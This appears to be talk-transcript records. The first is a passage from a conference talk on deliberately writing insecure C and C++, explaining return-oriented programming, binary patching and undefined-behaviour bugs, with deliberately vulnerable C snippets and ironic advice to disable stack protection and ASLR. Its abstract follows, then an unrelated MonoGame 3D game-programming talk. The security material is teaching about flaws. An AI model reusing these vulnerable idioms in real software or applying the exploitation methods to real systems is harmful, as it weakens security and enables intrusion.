But finally, even when you have all of the protection mechanisms — data execution prevention, stack protectors, ASLR and similar techniques — and they certainly make it difficult to hack into a system, there is a very powerful exploit technique called return-oriented programming that has become very popular in the last few years. I think the first paper around ROP came out in 2006, 2007, but it became common to use it only a few years ago. And according to someone that knows this much better than myself, ROP is used in nearly every single exploit that you hear about these days. And it's a very powerful technique and it's apparently impossible to stop it. And the reason is how a machine is working and how we are executing code. I take my binary now, which is called launch, and I just dump the data of that binary file. And by studying that data, I start recognizing a few things here that are very useful for ROP. Anyone know what these are? C6? Not loop? Oh, it's not no operation either. It can be used for a jump, that's the point. It's actually the RET instruction. It's actually the RET instruction. And there are other useful instructions out there that you can use, but the nice thing about RET is that it's reading an address from the stack and moving it into EIP, the instruction pointer. And in that way, you can build up a lot of addresses on the stack, and when you start unwinding the stack doing returns, it will just pick another return address and jump around. And I'll show you these things. You usually have programs, and this one is called ROPgadget. There are millions of those programs out there, which can look at the binary and then figure out: here are all the small bits and pieces of code that are unintentionally in your binary. For example, just to show you a very simple example: just before I return back to main, for some reason I want to increment ECX. I just want to run this small assembly instruction, inc ECX, and then return. Then I can put this address onto the stack first, and then have the real return address afterwards. And then it will first jump there, run inc ECX, then run the return, and jump back to main. And it has increased ECX by one, as if nothing has happened. But you're not limited to doing just one. You can actually build up a chain of these gadgets that are each doing a small little assembly instruction. And it has been shown — I think it's on Intel, ARM and SPARC CPUs — it has been shown that there is often a Turing-complete set of these gadgets in the programs that are running on them. So it is possible to imagine that by finding these gadgets and creating a long chain of small bits and pieces that is going to execute by just reading the stack and doing return, return, return, return, but just before the return doing a small thing, you can build up a whole program in there. And this is the technique that is often used. And it's very difficult to do by hand. So you typically always use programs, like in this case ROPgadget, which can find the gadgets and chain them together for you if you want to do a particular command. And then you have the payload that you can just dump into your target program. Yeah? Yes, you want to get around the no-execute protection. So you basically create your program as just a long string of data, and then you let the original program jump around in its own executable doing all these small pieces of instructions. So that's what return-oriented programming does. And just one of the more famous stories around return-oriented programming, and probably one of the stories that made it kind of famous and got magazines and newspapers writing about it: some researchers into return-oriented programming asked for access to one of the new voting machines that they're using in the States, which had, I don't know how many hundred, security researchers employed to kind of create a really secure machine. And they used this technique and they showed that they could actually exploit the voting machine that was designed to be unbreakable. And so far, there are very few suggestions on how to protect programs from exploits by return-oriented programming. So, back to... well, what I showed now is very realistic, but now to something slightly different. Here is a case which I find very, very interesting. And now that I know more about this one and similar cases, I see this all over the place in code bases. Now, this function, which is of course contrived because it has to be small enough to put on the page. But there is a fairly common idiom here. And that is: in this function, we are given a pointer, an offset and the end of the buffer that the pointer is pointing at, and then a value to poke into it. So just to be kind of secure, first we check if pointer plus offset is bigger than end, because then we have an out-of-bounds access. That's not good. The next thing we do — now, the offset is an unsigned value, but still we can have this kind of wrap going on.
So if it's a very large value, you can imagine that pointer plus offset becomes less than pointer, and that gives you — oh, it's a wrap. And that's not good. We don't want that. So we return. And if everything is okay, and we are confident that okay, we are within the buffer, then we poke the value in. And according to the researchers behind the paper that I read about this — the one I read was published in November last year — this is a very common idiom, also in what we would consider serious software. So they found a lot of, for example, Linux programs, even kernel modules, that use this as an idiom for checking for wraps. But here is the problem — and this is the out-of-bounds guard and this is the wrap guard. If we compile this without optimization, it works exactly as it is supposed to work. So we give it some large numbers. It's poking into the buffer. Then it detects, oh, we are out of the buffer. And since we use very large initial values, we get this wrap now. And yeah, so this seems to work. But with optimization, this happens: out of bounds, out of bounds. And now it's just poking into memory. So why is that? And this is something that you will see more and more of when you have code that has been working for a decade or two, and then suddenly a new optimization technique comes in and it starts reasoning better and better about your code. And in this case, there was a new version of a few compilers that came out where they figured out that this can never happen. I mean, first of all, pointer overflow is undefined behavior in C. So this is not going to happen anyway. So why should we generate code for something that will never happen? So if you look at the assembler here, it looks like this, and without going into details on that one, what has basically happened is that — well, this can never happen, so it just deleted it. This code is not present in the assembler. And this is something that you see over and over again: the optimizers become smarter and smarter and suddenly they remove code that you thought, oh, that's useful code. The compiler is smarter than you and says: the only way this check could ever trigger is through undefined behavior. Of course, you're not doing undefined behavior, are you? So I just remove it. You want fast code? That's the reason why you write in C and C++. And the research paper claims that there were like 200 modules or something like that in the Linux code that used this idiom, or that the idiom was used in 200 places — I can't remember exactly the numbers, but it's a common thing. And I see it in our code bases as well. It's something that people do. And you might say, oh, that's inconceivable, it should never happen. But as long as you're stepping outside of the rules for the language, then anything can happen.
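The function itself isn't reproduced in the transcript, but the idiom being described looks roughly like this (the names are invented):

```c
/* Roughly the idiom under discussion: guard against going past the end of
 * the buffer, then against pointer wrap-around, then write. Because pointer
 * arithmetic that overflows is undefined behaviour, an optimizer is allowed
 * to conclude that "p + offset < p" can never be true and delete that check
 * entirely -- which is exactly the surprise being described. */
#include <stddef.h>

void store_value(char *p, size_t offset, const char *end, char value)
{
    if (p + offset > end)      /* out-of-bounds guard                  */
        return;
    if (p + offset < p)        /* wrap guard -- may be optimized away  */
        return;
    p[offset] = value;
}

/* A formulation that does not rely on wrapped pointers compares the offset
 * against the remaining space instead: */
void store_value_safer(char *p, size_t offset, const char *end, char value)
{
    if (offset > (size_t)(end - p))
        return;
    p[offset] = value;
}
```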
So I have some more stuff about security, because security typically comes in layers, very much in layers. You put several layers of security and protection mechanisms on top of each other. And in this case, we might go into the source code and we might start trying to fix things and use fgets instead of gets, et cetera. But it's easy to forget that the easiest way to find the information you need is, if you have the binary, you just search for the strings inside, of course. I mean, it's silly, but I still have to mention it here, because you can have all these protection mechanisms in place and suddenly you realize you have actually leaked the password or you have leaked information. Similarly, if you have access to the binary, you can just disassemble the binary and you can read the authenticate and launch function and you can read how it works. And then we recognize: oh, that's the two missiles, isn't it? And that is the not-allowing-access. I can just use sed and patch that binary file in those two places and then run it. And suddenly we have access granted whatever we do, and we always launch 42 missiles. So that's also one way of doing it. If you're doing embedded applications, for example, sending out firmware to somewhere, and you allow someone to change the firmware before they upload it into your router or switch or whatever — well, that can happen. So yeah, so we recognize this thing. So that is a nice way of patching it. And you can also patch complete functions, of course. So here I write my own authenticate and launch: David rocks, launch 1983 missiles. Here is the assembler code, the machine code. We just create a printf with that particular thing and poke it directly into the memory. And as long as the function is smaller than the previous function, it's typically a very easy thing to do. You don't have to move things around or anything. You just replace the function completely. Now we're doing our stuff here without any fancy way of hacking into the system. So I just wanted to mention those before we go into the summary finale, where I'm now going to give 13, 14 tricks about how to write insecure code in C and C++. First of all, this one. It's very common for programmers to think that they know which one will be called first: oh, it's going to call a and then b. And that is true for all languages except C and C++. In C and C++, it can either call a first or b first. The only guarantee you have is that they are not going to execute at the same time. And this is called unspecified behavior. Actually, COBOL and Fortran also have this feature, but all the other languages that you know about will probably have a left-to-right evaluation. So trick number one: make sure that you write code that is depending on a particular evaluation order. This is a trick for writing insecure code, of course. Now, unspecified evaluation order has some serious consequences, very serious consequences. And that is: what is the value of n? Any suggestions? Yeah, it's undefined behavior. It can be 42, it can be zero, it can be seven, it can be whatever. And even if you have seen your own compiler generating exactly the same value over and over and over again, that doesn't mean that it will do so in the future. And it certainly doesn't mean that it will do so if you change the compiler. So this is an example of a sequence point violation, and you get undefined behavior. So trick number two: try to break the sequencing rules — that will give you some cool effects. And I'm showing you that one in the next one.
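The exact expressions on the slides aren't reproduced in the transcript, but the two classic shapes being talked about look roughly like this (deliberately broken code, shown only to illustrate the point):

```c
/* Deliberately questionable code. Which of a() and b() runs first is
 * unspecified, and modifying i twice with no sequencing in between is
 * undefined behaviour -- n can be anything, and so can the whole program. */
#include <stdio.h>

static int a(void) { puts("a"); return 1; }
static int b(void) { puts("b"); return 2; }
static int add(int x, int y) { return x + y; }

int main(void)
{
    add(a(), b());        /* unspecified: "a" or "b" may be printed first */

    int i = 2;
    int n = i++ + i++;    /* undefined behaviour: two unsequenced writes  */
    printf("n = %d\n", n);
    return 0;
}
```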
This one, for those who have been to a previous talk of mine and have probably seen this one before — you don't need to answer. But I think we have time to very briefly look at this. What do you think will actually happen if you compile and run this code in your development environment, without picking up your computer? Just try to guess. You have some experience with your own development environment. What do you think your compiler will do? I'm quite sure this will compile and this will run cleanly. So you don't need to look for missing semicolons or whatever. It's going to print the value. What do you think it will print? First one. Second one. Seven. I like that. Anything else? Eleven. I like that as well. Anyone higher? Yeah? 15? Oh, 21. That's even better. Anyone higher? Well, this is what happened on my computer. I have many compilers on my computer, so I just happened to pick three interesting ones. If I use the GCC that came with the operating system — not the one that I compile myself, which I do all the time, but the one that came with the operating system — GCC gives me 12, Clang gives me 11, and the Intel compiler gives me 13. This is a consequence of the unspecified evaluation order, and therefore the expression that you see here doesn't make sense, because we don't know whether i has been updated here or there or there, or when the side effect of plus plus i actually happens. Yes? You are ahead of me. Good. So trick number three: write insecure code where the result depends on the compiler. And if you want a detailed explanation with all the assembler involved, here is the link. So if you enable warnings for code like this — I don't know how many flags you want. So to write insecure code, it's important to know a lot about the weak spots, the blind spots, of your compiler, because there is always one annoying colleague that wants to add another flag: oh, I want minus f whatever. So know your blind spots. And the compilers will typically, well, they will try to warn you about things, but very often they can't see it, and sometimes they can see it but they have decided that I'm not going to diagnose this anyway. And remember, when you have undefined behavior — and that's what we saw, we saw undefined behavior — that's the reason why the compilers can just do whatever they want. Anything can happen. There is this saying on comp.std.c that when a compiler encounters a kind of illegal construct, it can try to make demons fly out of your nose. That's okay behavior. And this is what we see in this particular example. I'm not going to spend much time on that one, because we already discussed this bool problem slightly earlier. But the point is that if you have code like this, the problem is we don't initialize b, but we are still reading it. So that means b in theory can be whatever value — or in practice can be whatever value. So if you just put in a main and a bar function here, just to poke, for example, the value two into this memory location — remember how the stack was working on my machine — then we get the situation where it's trying to evaluate a b that has an internal representation of something that is not zero or one. And the compilers behave differently. The Intel compiler in this case will give true, Clang will give false, and GCC has this quantum behavior and gives me both true and false at the same time. So maybe this is the first preparation for quantum computing. With optimization, they all just happened to give false. So here you also see an example where the value changes completely with optimization as well. And it's different between the compilers. And once again, I described two concepts in this 90-minute talk that I did at ACCU last year, with all the assembler involved, and it was the previous one and it was this one. So if you want to see all the assembler code and an explanation for why this is happening, then you can go there and have a look. So write insecure code by messing up the internal state of the program.
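Again the slide code isn't in the transcript; a sketch of the kind of experiment being described — an uninitialized bool whose stack slot happens to hold the value 2 — could look like this. Everything about it is deliberately undefined behaviour, and whether the two functions actually end up sharing a stack slot is pure luck:

```c
/* Deliberately broken: b is read without ever being initialized. If the
 * stack slot it lands in happens to contain 2 (left there by poke()), the
 * in-memory value is neither 0 nor 1, and different compilers and
 * optimization levels are free to print "true", "false", both, or neither. */
#include <stdio.h>
#include <stdbool.h>

static void poke(void)
{
    volatile int x = 2;   /* try to leave the value 2 lying around on the stack */
    (void)x;
}

static void check(void)
{
    bool b;               /* never initialized -- that's the bug */
    if (b)
        puts("true");
    if (!b)
        puts("false");
}

int main(void)
{
    poke();
    check();
    return 0;
}
```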
Now this one — anyone see a problem with this function? Apart from being stupid and doing nothing serious? I mean, we're quite used to writing a function that takes an integer, does something with that integer and then returns something. So this is innocent-looking code. But there is a problem. We can get integer overflow. Because if we send in a large value, in this case INT_MAX, then we get signed integer overflow, and that is undefined behavior in C and C++. And you remember, when you have undefined behavior, anything can happen. So this might happen. Of course, you might say, well, unlikely. But remember, anything can happen. Even that thing — even though I would be surprised if it actually happened, it was a real phenomenon. But in theory, anything can happen. So make sure you write insecure code by just assuming valid input values. Don't check for large integers before you're doing calculations with them, because that would make your code more secure and less buggy. Trick number seven — no, trick number eight — this one. Now I have a small loop that is basically looping through i. And I've already given you a small hint about what might happen here. But this one terminates after doing four calculations and printing out four values, which is fine. That is what you would expect, maybe. But if you combine it with optimization, this can happen. And this actually happens on my machine. So what looked like a valid terminating condition is not a valid terminating condition in this case. Because this thing can never be true — no, it can never be anything but true. We are doing additions, and signed integer overflow is not allowed. So either it's crappy code, or this can never be anything but true. So the compiler will change it to true and therefore eliminate the code. If you have a good compiler, that is — lousy compilers don't see these kinds of things. So write insecure code by letting the optimizer remove apparently critical code for you. And here is a big topic. And there are plenty of C++ examples as well I could have used. What is the big problem here? It's of course the use of this one, strncpy. It looks like a kind of secure way of copying things. And it has a very bad name, but it was invented like 220 years ago, so they didn't think that far. Just kidding about the 220 years. But the point is that strncpy is not doing what you think it does, because it's not null-terminating the string. So if you write a large string — global thermonuclear war again — in this case you are filling up the buffer, and it's going to stop there. It's not going to do the buffer overwrite as, for example, strcpy would have done or whatever. But it's going to truncate it without null-terminating. So the effect is that when you print it out, it will continue after the string and into the next buffer, and you get this information leakage. Whenever you see strncpy, you should expect to find this line afterwards. And if you don't find that afterwards, you are probably looking at a bug. So you can just scan through your source code, look for strncpy, and if you don't see that terminating thing afterwards, you're probably looking at a bug. So write insecure code by using library functions incorrectly.
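As a concrete sketch of that strncpy trick (the buffer sizes and strings are made up, and whether anything interesting actually sits next to the destination buffer is up to the compiler):

```c
/* strncpy does NOT null-terminate when the source is at least as long as
 * the destination. Printing the destination afterwards can then run on into
 * whatever happens to be stored next to it. The conventional fix is the
 * explicit termination line that should follow every strncpy. */
#include <stdio.h>
#include <string.h>

int main(void)
{
    char secret[16] = "top secret data";   /* may or may not be adjacent */
    char name[8];

    strncpy(name, "global thermonuclear war", sizeof name);
    /* name is now completely full and not null-terminated */

    name[sizeof name - 1] = '\0';   /* the line you should expect to see
                                       right after every strncpy call     */

    printf("%s\n", name);           /* without the line above, this read
                                       could leak the neighbouring data   */
    (void)secret;
    return 0;
}
```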
And of course, you should never allow the stack protector to kick in, so you can disable it with -fno-stack-protector. Disable it. You should also make sure that ASLR is not working. You can either turn it off, or you can compile your code as not position independent. That's useful. And make sure you use old hardware and old operating systems, like five, six, seven year old machines and operating systems, because if you're lucky they don't have this data execution prevention, no NX bit in place. So go back a few years. Use that kind of old stuff. And here is another one. I've just shown an example here where I compile my program once using shared libraries and once with static libraries. And that makes a huge difference in the size of the program. So you see, in this case it's only 7K, and this one is 780K. The cool thing about that is that the larger the file is, the more gadgets you can find. So if you want to do ROP, you want to have a huge program that has a lot of kind of random data in there, so you can find a lot of gadgets that you can chain together and start exploiting the program. Make it easy to find ROP gadgets in your program. And you should not check the integrity of the code. So you should not do checksums when you distribute the code, and you should certainly not do a checksum when you load the program and install it on your machine and start running it, because that would make it difficult to kind of do patching of the binaries. So skip the integrity checks. And finally, perhaps most important, you must never, ever let other programmers review your code. So pair programming — forget about that. Never review code, because your colleagues might see all the crap that you are creating. So that was the advice for writing insecure code. And here is the summary. And thank you very much. So we are out of time, but I will hang around here a bit if you want to ask about something in particular.
|
Let's turn the table. Suppose your goal is to deliberately create buggy programs in C and C++ with serious security vulnerabilities that can be "easily" exploited. Then you need to know about things like stack smashing, shellcode, arc injection, return-oriented programming. You also need to know about annoying protection mechanisms such as address space layout randomization, stack canaries, data execution prevention, and more. This session will teach you the basics of how to deliberately write insecure programs in C and C++. Warning: there will be lots of assembler code in this talk.
|
10.5446/50857 (DOI)
|
OK, hi, hello everyone. I'm Richard Garside, I'm a freelance developer. In my spare time when I can't find anyone to pay me money to do work, I make games and other little side projects. So, who here learnt how to programme when they were kids so they could make games? Me, too. Who actually made any games past the age of about 18? I sort of stopped. Maybe around 18, 19, 20, and I started sort of, I got a serious job and stopped all that sort of stuff. I went through quite a golden age of computer games as a kid. I went from Chuckie Egg to Sonic the Hedgehog, all the way up to Tomb Raider. When Chuckie Egg was around, I was thinking I could make this, I could make Chuckie Egg, I could be a games programmer. This is quite exciting. And then the budgets around games got bigger and bigger, you got Grand Theft Auto, and I started to think that maybe game programming wasn't really for me. I didn't want to be part of one of those massive teams. I just wanted to sort of make stuff myself. And I was never really going to be able to make something like a Tomb Raider that people actually wanted. But two things recently changed my mind over the last year. One happened a little while ago, and that was sort of mobile games, and you found people playing on things like Chuckie Egg on their mobile phones again. And things like that getting really popular. Maybe I could make those, but I still sort of left it to the side a little bit. And then I saw a brilliant film called Indie Game the Movie. Here we go. And I'm also wearing the t-shirt. And it says, this is a lovely film. It sort of follows some small teams, sort of like one guy, two guys making a game. It doesn't pull any punches about how stressful actually making something for a deadline for a real sort of thing can be. But they were guys who were really proud of what they were doing, really excited. And it sort of made me think, oh, maybe I could start getting back into game development again. And I had a few ideas, and that's when I sort of started up again. So this talk is going to be about monogame. And monogame is quite a nice simple framework, but there are lots of really quite big games actually that have been made in monogame. So just to talk you through some of those. Oh no, too fast. Do this thing. There we go. So Fez was done with monogame. And it's an absolutely beautiful game. This is a game called Armed, which is another 3D game. It's all available on Windows 8. This is a game called Transistor. And then by far the best game ever to have been made with monogame is this one called Tower Blocks, made by a very talented developer. And it's got amazing music. So it's basically a 3D version of Tetris, and this is the game that I've made. It's not been the massive success I would hope. So I figured my only chance of actually getting people to download this and maybe get it to the flappy birds level I'm hoping for is to travel the world telling people individually about it. As you leave, there are some stickers by the sort of the voting green, red, yellow thing. So you can take a sticker, you can download my game, give me an unfairly high rating on iTunes. That would be good. But it's sort of... It shows one of the nice things about monogame, which is that I've written the code once, but I've got it working on iOS, Windows 8, and Windows Phone 8. Hopefully Android soon as well. I made this game, I was very pleased with myself, and was bitterly disappointed that it wasn't becoming the massive success that it deserved to be. And then I saw this game.
And this game is called Monument Valley. And it's beautiful. It's an absolutely beautiful game. And I was blown away by how beautiful it was and how much art and craft had gone into it. And it was a massive success and it absolutely deserved to be. And I went back to look at my game and was like, fair enough. Maybe I've got a lot to learn. And it's actually, I've been programming for 20 years, but I've only really been making games in my spare time for the last year. And it is an art form. And maybe, I guess someone said a really nice thing recently about business projects versus art projects. Now a business project is a success if you make your money back. But an art project is successful if you're really proud of it and it's really beautiful. And I think anything can be an art project. And maybe that's really sort of, it was kind of my motivation for doing it in the first place. I really enjoyed making it. I haven't become financially rich and wealthy, but that is to come, obviously. But maybe game two, game three, as I improve in these sort of things, I'll sort of get there. So... Is this where we are? Yes, we're going to get on to 3D, but very quickly first we're going to have to cover all of 2D. Who here has used MonoGame before? So a few of you, and have you used 2D or 3D? Three. Three. Okay, so well. The 2D stuff is... Actually, who here went to Rune's talk on 2D and physics? Okay, so I'm going to cover all of Rune's talk in the next 5, 10 minutes. Yeah, but showing that his talk was rubbish. So MonoGame has... When you start a new project, you'll get something very much like this. Except your game won't be called Dalek Game, it'll be called Game One. There are... I'll just minimise these so you can see them. There are just a few methods. And these sort of form the main part of it. There are sort of two main stages of a game running. The first is sort of loading and initialising. So we go through the constructor, initialise and loading content. And that's done fairly quickly. And then for the rest of the game, it's constantly looping through what is called the game loop between this update method and this draw method. And the faster it can do that, the higher the frame rate for your game will be. And draw is purely just draw stuff to screen, and update is anything you need to actually move the positions of things or, you know, take input from the user, find out that someone's died or that the score has increased, all those sort of things. That happens in update and then draw. And it sort of goes around those as quickly as possible. Now, in this first... So the first thing you need to do is load content. And content can be anything, but for this very simple 2D demo, we're just going to be looking at loading a texture which will form part of our sprite. So MonoGame has a content manager accessible by content. And you do content.load, you tell it what sort of content you want to load, and then the file name. The file name is over here, which is... Files are also in a folder called content. And... So here's my content folder. And you can see I've got various images in there and a Dalek, which we will see shortly. So that's where all the content is coming from. Now, I'm storing my textures just as PNG files. They need to be a power of 2 wide. So, you know, 64, 128, 256. Not on all platforms, but on some they do. So it's sort of safer to keep them that way.
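As a rough sketch of the skeleton being described here, assuming the standard MonoGame Game class and Content APIs (the class name, the field names and the "dragon" asset name are just illustrative, not the talk's actual project):

```csharp
using Microsoft.Xna.Framework;
using Microsoft.Xna.Framework.Graphics;

public class DalekGame : Game
{
    GraphicsDeviceManager _graphics;
    SpriteBatch _spriteBatch;
    Texture2D _texture;

    public DalekGame()
    {
        _graphics = new GraphicsDeviceManager(this);
        Content.RootDirectory = "Content";   // assets live in the Content folder
    }

    protected override void LoadContent()
    {
        // SpriteBatch batches up 2D draw calls for the GPU
        _spriteBatch = new SpriteBatch(GraphicsDevice);

        // Load the PNG from the Content folder by name (no file extension)
        _texture = Content.Load<Texture2D>("dragon");
    }

    protected override void Update(GameTime gameTime)
    {
        // Input, movement, scoring and so on would go here
        base.Update(gameTime);
    }

    protected override void Draw(GameTime gameTime)
    {
        // Drawing is covered in the next sketch
        base.Draw(gameTime);
    }
}
```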
And I'm just loading my dragon texture in there, and I'm storing it in a global variable called texture. I'm not doing anything to it in the update, so we're not moving. So all I'm doing is drawing him to screen. And the first thing I'm doing is I'm clearing the screen. So every time I'm looping round, I'm clearing the screen and setting just a blank background colour, which is going to be dark green. And then there's a sprite batch, and the sprite batch sort of just contains all your sprites that you're going to draw. And you just pass it three simple parameters. One is the texture that you've loaded. And the next is a two-dimensional vector which stores its position on screen. And its position on screen is from the top left-hand corner, so it's the X along and the Y down. So I've just got it 100 across and 100 down. The Color.White just means you're not going to fiddle with the colours. You just want them as they are in the actual texture. So then we will run this in the iPhone retina, 4-inch thing. And there we go. So basically that's Rune's talk. He also had some physics in his talk, but essentially he showed us... He was moving. Yeah, his dragon was moving, and it was doing cool things, and there were bubbles. But bubbles are boring. So now we have a lovely 2D texture. It's just shown in 2D space. There's no 3D there. So that's basically all you need to know for drawing 2D graphics. And I sort of stayed away from 3D for quite a long time. I sort of wanted to do it. I remember at university we had a little make-a-game project. I tried to make a robots-fighting-each-other game, and it was rubbish. And some other guys made a submarine game. And it looked brilliant because they just had this 3D submarine floating through a little world. The game was actually really boring, but it looked beautiful, and the submarine model was really simple. But I was like, oh, those guys are amazing. They've done 3D, I couldn't possibly do that. Far too difficult. And there's lots of things that make you think it might be hard. There's 3D models, there's textures. On the programming side, there are matrices, and matrices just look horrendous, and I'm quite scared of them. I'm still quite scared of them. Shaders... actually, we're not going to cover shaders because I am still scared of shaders, but next time I do this talk, I'll be able to tell you all about shaders, and hopefully they're not quite as scary as they look. So those are the sort of things that you need to know about 3D. The artwork side, and that's always difficult in a game, is finding someone or learning those skills yourself to do the actual artwork stuff. But one of the really nice things about 3D is that actually quite simple 3D models can look really impressive, and seeing something rotating and moving in 3D space realistically, and having some nice lighting effects on it, looks amazing, and you don't actually have to be that good at drawing to get that sort of effect. So no, not that one. Too many monitors gets confusing. There we go, back to here. So what we're going to do is we're going to take something like a nice two-dimensional shape, but we're going to show it in 3D. So we're going to... I've written a little... actually, sorry, back up a little bit. To draw three-dimensional stuff, you need two things. You need a three-dimensional model, and a camera.
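A minimal sketch of that Draw call, assuming the _spriteBatch and _texture fields from the skeleton above; the position and background colour are the ones mentioned in the talk:

```csharp
protected override void Draw(GameTime gameTime)
{
    // Wipe the previous frame with a plain background colour
    GraphicsDevice.Clear(Color.DarkGreen);

    _spriteBatch.Begin();

    // Texture, position measured from the top-left corner (x across, y down),
    // and Color.White meaning "draw the texture with its own colours, untinted"
    _spriteBatch.Draw(_texture, new Vector2(100, 100), Color.White);

    _spriteBatch.End();

    base.Draw(gameTime);
}
```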
A camera is responsible for taking that three-dimensional thing and working out how to turn that into a two-dimensional object that can get displayed on your screen, where the angles are, what works, what sides to show. So those are the two things. You need a camera and a 3D model. So first of all, let's load up another texture to show on our thing. So texture equals content.load. And again, this is just going to be a 2D texture like before. I called it slide. But now the two-dimensional texture itself is not enough. We're going to need something to put it on. We're going to need a two-dimensional plane. So I've created a class, which I'll go and explain shortly, called texture plane. So slide equals new texture plane. There it is. And this needs to know about the graphics device, which is an underlying thing that MonoGame gives you, which is also used by the sprite batch. Nope, I don't understand my shortcuts. I apologise. Graphics. There it is. The problem is the tool tip is hiding the code I was looking at. Next, it's looking for the texture, which we've just loaded up in the line below, the line above, sorry. Next is a world matrix to sort of place it. You don't need to provide that. That's optional. So I will leave that for the moment. And again, we will come back to it. So we've got a two-dimensional texture, and we've placed it on this little sort of flat surface that we can place in 3D space. The next part is we need to load up a camera. So I have a camera. And again, camera is a class I've created, and we'll come and explain exactly how that works shortly. But it's not as complicated as it might seem. So I'm just going to go camera. It calls new camera. And it wants four things. And the first three things are to do with where the camera is positioned. Now, before we were looking at two-dimensional vectors that positioned something in two-dimensional space, now we're looking at 3D vectors with three dimensions to them, so x, y and z. And the first thing the camera wants to know is where the camera is. So where the... well, the cameraman, if there was such a thing in your computer game, is holding the camera. Secondly, the target, where he's pointing it. And next, which way is up? Is he sort of standing that way, or is he lying down while filming it? So the position is... we'll have it at zero along the x, then go up on the y, so I'll float 15 into the air. And then the z-axis means I'm coming towards you, so I'll come towards you by 15. So that's where the camera is. And then I'm going to look at what is known as the origin, which is where x, y and z are all zero, and you can use a handy little shortcut for that, Vector3.Zero. Up, you just need a vector which sort of has the number in the correct one, so I want up to be y. But again, there's a handy shortcut for this, Vector3.Up. Now, there is... It doesn't care that much exactly where up is. It doesn't like... So if you think about the camera pointing that way, up should ideally be at a right angle to it, but if you sort of go down, you don't have to work out exactly where the right angle is. What you shouldn't do, which I have discovered to my cost and it's taken me several hours to work out why, is have the up exactly pointing the opposite way to which you are looking, because nothing will appear on the screen. You'll have no idea why. You'll start to panic.
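Something like the following is what that set-up might look like in code; TexturePlane and Camera are the speaker's own helper classes, so the constructor signatures here are assumptions based on what he describes, and the field names are just illustrative:

```csharp
// In LoadContent():
_texture = Content.Load<Texture2D>("slide");
_slide = new TexturePlane(GraphicsDevice, _texture);   // flat surface to put the texture on

_camera = new Camera(
    new Vector3(0, 15, 15),  // where the camera is standing: up 15 on y, back 15 on z
    Vector3.Zero,            // what it is looking at: the origin
    Vector3.Up,              // which way is up (never the exact opposite of the view direction!)
    Window);                 // the game window, used later for the screen resolution
```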
And three or four hours later, you'll be sort of hitting your head against a wall when you realize what you've done. So that's sort of the setting of the camera. And then the next part is it needs to know how big the screen is, and that comes in the game window. So... Window. There we go. And that's just a property provided to you by the underlying game class that I've inherited from, which is, as you can see, just there. So that's one of the things you get for free out of MonoGame. It will work out the screen resolution for you. So that's our camera. And then we just need to draw it to screen. So, slide.draw. And it wants the camera, because the camera will help it draw itself to screen. Yeah. Nope. Do-do-do. And we've drawn something to screen, but now you can see what I've done is I've drawn it far too big. So this is one of the things we can use a matrix for, to transform that. Now, as I said before, matrices are sort of one of the things that scared me off 3D programming. They're these sort of grids of numbers. You multiply them together, and you multiply this number by that number, then this number by that number, and then you've done it wrong and you have to start again. But all that's done by the computer, really. You don't need to know what the specific matrix is for a particular thing. You just need to know that this group of numbers will help you, and it will do something, and you need to know the correct one to use. And you can use the sort of built-in constants in MonoGame to get the correct one for you and to sort of generate those. So, when we made our texture plane here, it was asking for a third parameter, which was a matrix. It's asking for the world matrix. And in 3D gaming, the world matrix is the thing that places your object in the world. You have a little object in a 3D sort of program somewhere that you've made, and it's sat around zero, zero, zero on the origin. But when you come to actually put it in your 3D world, you want to move it. So, the world matrix is the matrix that puts it into the world. So, let's create a matrix that's going to scale our object, a scale matrix, and make it smaller, so we can actually see it. And we just use matrix. As soon as you type dot create, you start to see, if you spell it right anyway, all these different matrices you can create for various different transformation functions. So, we're going to scale, and I've written down somewhere the right number, there we go. We're going to scale it by a factor of 0.005. And then we're going to pass in that scale matrix into there. And now... We can see the 3D isn't that hard at all, except I'm going to shatter that by now showing you the plane class, this plane matrix, not plane matrix, flat plane. So, in my little extras folder, texture plane. So, this is a class which takes just four vertices, and vertices are sort of the points, and draws them to screen. But it does so using vertex position textures, and you sort of have to set the position and texture coordinates for it, and then you have to create a vertex buffer. And I copied and pasted this code, and I don't fully understand it, but it isn't actually so bad, but even if you were just drawing a cube, this would quickly get out of hand. So, I don't really recommend drawing vertex buffers for anything more complicated than quite straightforward shapes, because there's a much easier way.
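For reference, a rough sketch of what a textured-quad class along those lines might look like, using VertexPositionTexture, a VertexBuffer and a stock BasicEffect. This is an illustration rather than the speaker's actual TexturePlane code, and here Draw takes the view and projection matrices directly instead of his Camera class:

```csharp
using Microsoft.Xna.Framework;
using Microsoft.Xna.Framework.Graphics;

// A flat textured quad: four corners, drawn as two triangles in a strip.
public class TexturePlane
{
    readonly GraphicsDevice _device;
    readonly BasicEffect _effect;
    readonly VertexBuffer _vertexBuffer;

    public Matrix World { get; set; }

    public TexturePlane(GraphicsDevice device, Texture2D texture, Matrix? world = null)
    {
        _device = device;
        World = world ?? Matrix.Identity;   // the optional world matrix to place it

        // A unit quad in the XY plane; each vertex carries a position and a UV coordinate
        var vertices = new[]
        {
            new VertexPositionTexture(new Vector3(-1,  1, 0), new Vector2(0, 0)),
            new VertexPositionTexture(new Vector3( 1,  1, 0), new Vector2(1, 0)),
            new VertexPositionTexture(new Vector3(-1, -1, 0), new Vector2(0, 1)),
            new VertexPositionTexture(new Vector3( 1, -1, 0), new Vector2(1, 1)),
        };

        _vertexBuffer = new VertexBuffer(device, typeof(VertexPositionTexture),
                                         vertices.Length, BufferUsage.WriteOnly);
        _vertexBuffer.SetData(vertices);

        _effect = new BasicEffect(device) { TextureEnabled = true, Texture = texture };
    }

    public void Draw(Matrix view, Matrix projection)
    {
        _effect.World = World;
        _effect.View = view;
        _effect.Projection = projection;

        _device.SetVertexBuffer(_vertexBuffer);
        foreach (var pass in _effect.CurrentTechnique.Passes)
        {
            pass.Apply();
            // Two triangles drawn as a strip from the four vertices
            _device.DrawPrimitives(PrimitiveType.TriangleStrip, 0, 2);
        }
    }
}
```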
